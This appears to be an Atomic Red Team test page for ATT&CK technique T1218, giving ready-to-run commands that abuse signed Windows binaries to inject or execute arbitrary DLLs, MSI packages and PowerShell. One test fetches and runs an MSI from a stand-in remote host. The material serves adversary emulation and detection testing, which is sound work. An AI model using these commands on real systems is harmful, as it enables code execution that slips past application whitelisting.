T1218.md

T1218 - Signed Binary Proxy Execution

Description from ATT&CK

Binaries signed with trusted digital certificates can execute on Windows systems protected by digital signature validation. Several Microsoft signed binaries that are default on Windows installations can be used to proxy execution of other files. This behavior may be abused by adversaries to execute malicious files that could bypass application whitelisting and signature validation on systems. This technique accounts for proxy execution methods that are not already accounted for within the existing techniques.

Msiexec.exe

Msiexec.exe is the command-line Windows utility for the Windows Installer. Adversaries may use msiexec.exe to launch malicious MSI files for code execution. An adversary may use it to launch local or network accessible MSI files.(Citation: LOLBAS Msiexec)(Citation: Rancor Unit42 June 2018)(Citation: TrendMicro Msiexec Feb 2018) Msiexec.exe may also be used to execute DLLs.(Citation: LOLBAS Msiexec)

• msiexec.exe /q /i "C:\path\to\file.msi"
• msiexec.exe /q /i http[:]//site[.]com/file.msi
• msiexec.exe /y "C:\path\to\file.dll"

Mavinject.exe

Mavinject.exe is a Windows utility that allows for code execution. Mavinject can be used to input a DLL into a running process. (Citation: Twitter gN3mes1s Status Update MavInject32)

• "C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe" <PID> /INJECTRUNNING <PATH DLL>
• C:\Windows\system32\mavinject.exe <PID> /INJECTRUNNING <PATH DLL>

SyncAppvPublishingServer.exe

SyncAppvPublishingServer.exe can be used to run PowerShell scripts without executing powershell.exe. (Citation: Twitter monoxgas Status Update SyncAppvPublishingServer)

Odbcconf.exe

Odbcconf.exe is a Windows utility that allows you to configure Open Database Connectivity (ODBC) drivers and data source names.(Citation: Microsoft odbcconf.exe) The utility can be misused to execute functionality equivalent to Regsvr32 with the REGSVR option to execute a DLL.(Citation: LOLBAS Odbcconf)(Citation: TrendMicro Squiblydoo Aug 2017)(Citation: TrendMicro Cobalt Group Nov 2017)

• odbcconf.exe /S /A {REGSVR "C:\Users\Public\file.dll"}

Several other binaries exist that may be used to perform similar behavior. (Citation: GitHub Ultimate AppLocker Bypass List)

Atomic Tests

• Atomic Test #1 - mavinject - Inject DLL into running process

• Atomic Test #2 - SyncAppvPublishingServer - Execute arbitrary PowerShell code

• Atomic Test #3 - Register-CimProvider - Execute evil dll

• Atomic Test #4 - Msiexec.exe - Execute Local MSI file

• Atomic Test #5 - Msiexec.exe - Execute Remote MSI file

• Atomic Test #6 - Msiexec.exe - Execute Arbitrary DLL

• Atomic Test #7 - Odbcconf.exe - Execute Arbitrary DLL

• Atomic Test #8 - InfDefaultInstall.exe .inf Execution

Atomic Test #1 - mavinject - Inject DLL into running process

Injects arbitrary DLL into running process specified by process ID. Requires Windows 10.

Supported Platforms: Windows

Inputs:

Name	Description	Type	Default Value
dll_payload	DLL to inject	Path	PathToAtomicsFolder\T1218\src\x64\T1218.dll
process_id	PID of process receiving injection	string	1000

Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)

mavinject.exe #{process_id} /INJECTRUNNING #{dll_payload}

Atomic Test #2 - SyncAppvPublishingServer - Execute arbitrary PowerShell code

Executes arbitrary PowerShell code using SyncAppvPublishingServer.exe. Requires Windows 10.

Supported Platforms: Windows

Inputs:

Name	Description	Type	Default Value
powershell_code	PowerShell code to execute	string	Start-Process calc.exe

Attack Commands: Run with command_prompt!

SyncAppvPublishingServer.exe "n; #{powershell_code}"

Atomic Test #3 - Register-CimProvider - Execute evil dll

Execute arbitrary dll. Requires at least Windows 8/2012. Also note this dll can be served up via SMB

Supported Platforms: Windows

Inputs:

Name	Description	Type	Default Value
dll_payload	DLL to execute	Path	PathToAtomicsFolder\T1218\src\Win32\T1218-2.dll

Attack Commands: Run with command_prompt!

C:\Windows\SysWow64\Register-CimProvider.exe -Path #{dll_payload}

Atomic Test #4 - Msiexec.exe - Execute Local MSI file

Execute arbitrary MSI file. Commonly seen in application installation.

Supported Platforms: Windows

Inputs:

Name	Description	Type	Default Value
msi_payload	MSI file to execute	Path	PathToAtomicsFolder\T1218\src\Win32\T1218.msi

Attack Commands: Run with command_prompt!

msiexec.exe /q /i "#{msi_payload}"

Atomic Test #5 - Msiexec.exe - Execute Remote MSI file

Execute arbitrary MSI file retrieved remotely. Less commonly seen in application installation, commonly seen in malware execution.

Supported Platforms: Windows

Inputs:

Name	Description	Type	Default Value
msi_payload	MSI file to execute	String	http://site.com/file.msi

Attack Commands: Run with command_prompt!

msiexec.exe /q /i "#{msi_payload}"

Atomic Test #6 - Msiexec.exe - Execute Arbitrary DLL

Execute arbitrary DLL file stored locally. Commonly seen in application installation.

Supported Platforms: Windows

Inputs:

Name	Description	Type	Default Value
dll_payload	DLL to execute	Path	PathToAtomicsFolder\T1218\src\Win32\T1218-2.dll

Attack Commands: Run with command_prompt!

msiexec.exe /y "#{dll_payload}"

Atomic Test #7 - Odbcconf.exe - Execute Arbitrary DLL

Execute arbitrary DLL file stored locally.

Supported Platforms: Windows

Inputs:

Name	Description	Type	Default Value
dll_payload	DLL to execute	Path	PathToAtomicsFolder\T1218\src\Win32\T1218-2.dll

Attack Commands: Run with command_prompt!

odbcconf.exe /S /A {REGSVR "#{dll_payload}"}

Atomic Test #8 - InfDefaultInstall.exe .inf Execution

Test execution of a .inf using InfDefaultInstall.exe

Reference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSBinaries/Infdefaultinstall.yml

Supported Platforms: Windows

Inputs:

Name	Description	Type	Default Value
inf_to_execute	Local location of inf file	string	PathToAtomicsFolder\T1218\src\Infdefaultinstall.inf

Attack Commands: Run with command_prompt!

InfDefaultInstall.exe #{inf_to_execute}